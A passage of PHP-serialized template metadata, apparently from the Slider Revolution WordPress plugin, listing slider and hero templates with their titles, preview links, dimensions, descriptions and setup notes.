href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:24;a:22:{s:2:\"id\";s:2:\"25\";s:5:\"title\";s:16:\"Search Form Hero\";s:5:\"alias\";s:16:\"search-form-hero\";s:3:\"zip\";s:20:\"search-form-hero.zip\";s:3:\"uid\";s:32:\"e09eb1bd0f22b3a2b02a1aa251dd1f3e\";s:3:\"img\";s:27:\"search-form-hero/slider.jpg\";s:7:\"preview\";s:60:\"http://revolution.themepunch.com/wordpress-search-form-hero/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">This hero block uses a custom styled input field to show search results on a WordPress site.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:320:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image, texts, and search field code.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:25;a:22:{s:2:\"id\";s:2:\"26\";s:5:\"title\";s:17:\"Showcase Carousel\";s:5:\"alias\";s:16:\"showcasecarousel\";s:3:\"zip\";s:20:\"showcasecarousel.zip\";s:3:\"uid\";s:32:\"c5ca218398331bd2c064efc2f62eae56\";s:3:\"img\";s:27:\"showcasecarousel/slider.jpg\";s:7:\"preview\";s:62:\"http://revolution.themepunch.com/wordpress-cover-flow-gallery/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">A fancy carousel that rotates, fades and scales slider items.</span>\r\n<span class=\"ttm_space\"></span>\r\n\";s:11:\"setup_notes\";s:284:\"<span class=\"ttm_content\">This is a \"Default\" content carousel. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:26;a:22:{s:2:\"id\";s:2:\"27\";s:5:\"title\";s:11:\"Sports Hero\";s:5:\"alias\";s:11:\"sports-hero\";s:3:\"zip\";s:14:\"sportshero.zip\";s:3:\"uid\";s:32:\"8de7a145f32a362d618d2595ffa2f724\";s:3:\"img\";s:21:\"sportshero/slider.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/wordpress-image-hero/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"720\";s:11:\"description\";s:113:\"<span class=\"ttm_content\">An sports themed image hero block with buttons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:27;a:22:{s:2:\"id\";s:2:\"28\";s:5:\"title\";s:12:\"Twitter Feed\";s:5:\"alias\";s:12:\"twitter-feed\";s:3:\"zip\";s:16:\"twitter-feed.zip\";s:3:\"uid\";s:32:\"efbfc2af5da5258e7b7bed8598e483cc\";s:3:\"img\";s:23:\"twitter-feed/slider.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/wordpress-twitter-feed/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"640\";s:11:\"description\";s:173:\"<span class=\"ttm_content\"> This slider is automatically populated by a Twitter stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:414:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Twitter Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:28;a:22:{s:2:\"id\";s:2:\"29\";s:5:\"title\";s:13:\"Vimeo Gallery\";s:5:\"alias\";s:13:\"vimeo-gallery\";s:3:\"zip\";s:17:\"vimeo-gallery.zip\";s:3:\"uid\";s:32:\"fa824ce1ff3942ec268fc9eda60df539\";s:3:\"img\";s:24:\"vimeo-gallery/slider.jpg\";s:7:\"preview\";s:57:\"http://revolution.themepunch.com/wordpress-vimeo-gallery/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1230\";s:6:\"height\";s:3:\"692\";s:11:\"description\";s:170:\"<span class=\"ttm_content\">This slider is automatically populated by a Vimeo stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:412:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Vimeo Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:29;a:22:{s:2:\"id\";s:2:\"30\";s:5:\"title\";s:10:\"Vimeo Hero\";s:5:\"alias\";s:9:\"vimeohero\";s:3:\"zip\";s:13:\"vimeohero.zip\";s:3:\"uid\";s:32:\"c575575f96173d88589cddcb06120b77\";s:3:\"img\";s:20:\"vimeohero/slider.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/wordpress-hero-vimeo/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:116:\"<span class=\"ttm_content\">A commonly used Vimeo video background hero block.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:464:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background video and texts.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:30;a:22:{s:2:\"id\";s:2:\"31\";s:5:\"title\";s:16:\"Web Product Dark\";s:5:\"alias\";s:16:\"web-product-dark\";s:3:\"zip\";s:20:\"web-product-dark.zip\";s:3:\"uid\";s:32:\"39b872cf0608e63c3a503e58374dc30a\";s:3:\"img\";s:27:\"web-product-dark/slider.jpg\";s:7:\"preview\";s:60:\"http://revolution.themepunch.com/wordpress-frontpage-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:194:\"<span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:31;a:22:{s:2:\"id\";s:2:\"32\";s:5:\"title\";s:21:\"Web Product Dark Hero\";s:5:\"alias\";s:21:\"web-product-dark-hero\";s:3:\"zip\";s:25:\"web-product-dark-hero.zip\";s:3:\"uid\";s:32:\"b6784e8925221f36677217979d26e6f0\";s:3:\"img\";s:32:\"web-product-dark-hero/slider.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/wordpress-header-image/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:162:\"<span class=\"ttm_content\">A modern hero block with three common devices. The screens of each device can be changed easily!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:32;a:22:{s:2:\"id\";s:2:\"33\";s:5:\"title\";s:22:\"Web Product Light Hero\";s:5:\"alias\";s:22:\"web-product-light-hero\";s:3:\"zip\";s:26:\"web-product-light-hero.zip\";s:3:\"uid\";s:32:\"428e65d6aaa6ef775429989d50516492\";s:3:\"img\";s:33:\"web-product-light-hero/slider.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/hero-image-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:162:\"<span class=\"ttm_content\">A modern hero block with three common devices. The screens of each device can be changed easily!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:289:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:33;a:22:{s:2:\"id\";s:2:\"34\";s:5:\"title\";s:17:\"Web Product Light\";s:5:\"alias\";s:15:\"webproductlight\";s:3:\"zip\";s:19:\"webproductlight.zip\";s:3:\"uid\";s:32:\"fa23dab5bf1139c6393828647a9de4e0\";s:3:\"img\";s:26:\"webproductlight/slider.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/wordpress-cover-page/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:194:\"<span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:34;a:22:{s:2:\"id\";s:2:\"35\";s:5:\"title\";s:15:\"Youtube Gallery\";s:5:\"alias\";s:15:\"youtube-gallery\";s:3:\"zip\";s:19:\"youtube-gallery.zip\";s:3:\"uid\";s:32:\"ee9e4928ac74f5f0c0b697ce708f5aa7\";s:3:\"img\";s:26:\"youtube-gallery/slider.jpg\";s:7:\"preview\";s:59:\"http://revolution.themepunch.com/wordpress-youtube-gallery/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:173:\"<span class=\"ttm_content\"> This slider is automatically populated by a YouTube stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:414:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"YouTube Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:35;a:24:{s:2:\"id\";s:2:\"36\";s:5:\"title\";s:12:\"Youtube Hero\";s:5:\"alias\";s:11:\"youtubehero\";s:3:\"zip\";s:15:\"youtubehero.zip\";s:3:\"uid\";s:32:\"e0b2c12a45841bdf21cb96305f2c85bf\";s:3:\"img\";s:22:\"youtubehero/slider.jpg\";s:7:\"preview\";s:58:\"http://revolution.themepunch.com/wordpress-youtube-header/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:104:\"<span class=\"ttm_content\">A YouTube video background hero block.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:633:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background video and texts.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\nLearn how to <a href=\"https://www.themepunch.com/faq/enable-sound-for-the-youtube-hero-template/\" target=\"_blank\">enable sound for the background video</a><br /><br />\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;s:6:\"is_new\";b:1;s:10:\"push_image\";b:1;}i:36;a:22:{s:2:\"id\";s:2:\"37\";s:5:\"title\";s:13:\"Scroll Effect\";s:5:\"alias\";s:13:\"scroll-effect\";s:3:\"zip\";s:17:\"scroll-effect.zip\";s:3:\"uid\";s:32:\"417f59e9db87aa7e47c8509eb88d4af6\";s:3:\"img\";s:23:\"scrolleffect/slide1.jpg\";s:7:\"preview\";s:60:\"http://revolution.themepunch.com/big-bold-fullscreen-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:134:\"<span class=\"ttm_content\">A full-screen slider with a unique scroll effect and big, bold text.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:485:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>For further configuration options please view the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">\"Custom CSS/JS\"</a> section in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:37;a:22:{s:2:\"id\";s:2:\"38\";s:5:\"title\";s:12:\"Content Zoom\";s:5:\"alias\";s:12:\"content-zoom\";s:3:\"zip\";s:16:\"content-zoom.zip\";s:3:\"uid\";s:32:\"42ef8cdb70d42ec6ff6fa3b69a027b5f\";s:3:\"img\";s:22:\"contentzoom/slide1.jpg\";s:7:\"preview\";s:53:\"http://revolution.themepunch.com/content-zoom-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:243:\"<span class=\"ttm_content\">A very unique full-width slider that uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to their potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:371:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:38;a:22:{s:2:\"id\";s:2:\"39\";s:5:\"title\";s:13:\"Food Carousel\";s:5:\"alias\";s:13:\"food-carousel\";s:3:\"zip\";s:17:\"food-carousel.zip\";s:3:\"uid\";s:32:\"a7bf54527b6658a0a308c70c729779fe\";s:3:\"img\";s:29:\"foodcarousel/slider_cover.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/food-carousel-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:267:\"<span class=\"ttm_content\">A fancy carousel with detail content on each slide. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> are used to show and hide layers.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:371:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:39;a:22:{s:2:\"id\";s:2:\"40\";s:5:\"title\";s:14:\"Rotating Words\";s:5:\"alias\";s:14:\"rotating-words\";s:3:\"zip\";s:18:\"rotating-words.zip\";s:3:\"uid\";s:32:\"70190463d9376f278c8197b7b2ef6c1b\";s:3:\"img\";s:24:\"rotatingwords/slide1.jpg\";s:7:\"preview\";s:53:\"http://revolution.themepunch.com/rotating-words-hero/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:134:\"<span class=\"ttm_content\">A full-screen hero block with unique animated text and blur effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:495:\"<span class=\"ttm_content\">This is a \"Default\" hero slider. Edit the slide to change the background media and texts.<br/>For further configuration options please view the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">\"Custom CSS/JS\"</a> section in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:40;a:22:{s:2:\"id\";s:2:\"41\";s:5:\"title\";s:22:\"Travel Static Captions\";s:5:\"alias\";s:22:\"travel-static-captions\";s:3:\"zip\";s:26:\"travel-static-captions.zip\";s:3:\"uid\";s:32:\"bbe7d61c7c741ebc7aa1ce1082b0cb71\";s:3:\"img\";s:33:\"travel-static-captions/slide1.jpg\";s:7:\"preview\";s:50:\"http://revolution.themepunch.com/travel-slideshow/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:148:\"<span class=\"ttm_content\">A slideshow example with static captions layers above a rotating image background.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:41;a:22:{s:2:\"id\";s:2:\"42\";s:5:\"title\";s:7:\"Concept\";s:5:\"alias\";s:7:\"concept\";s:3:\"zip\";s:11:\"concept.zip\";s:3:\"uid\";s:32:\"47cb06083e87503762f6746725117a3c\";s:3:\"img\";s:18:\"concept/slide1.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/fullscreen-wordpress-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:232:\"<span class=\"ttm_content\">A full-screen slider that uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to their potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:371:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:42;a:22:{s:2:\"id\";s:2:\"43\";s:5:\"title\";s:15:\"True Fullscreen\";s:5:\"alias\";s:17:\"fullscreen-button\";s:3:\"zip\";s:21:\"fullscreen-button.zip\";s:3:\"uid\";s:32:\"618a43bdf89333b555531f6d6ecde359\";s:3:\"img\";s:28:\"fullscreen-button/slide1.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/wordpress-sidebar-slideshow/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:3:\"5.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:246:\"<span class=\"ttm_content\">A slider with a full-screen button that uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to their potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:297:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change the background images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:43;a:22:{s:2:\"id\";s:2:\"44\";s:5:\"title\";s:16:\"Creative 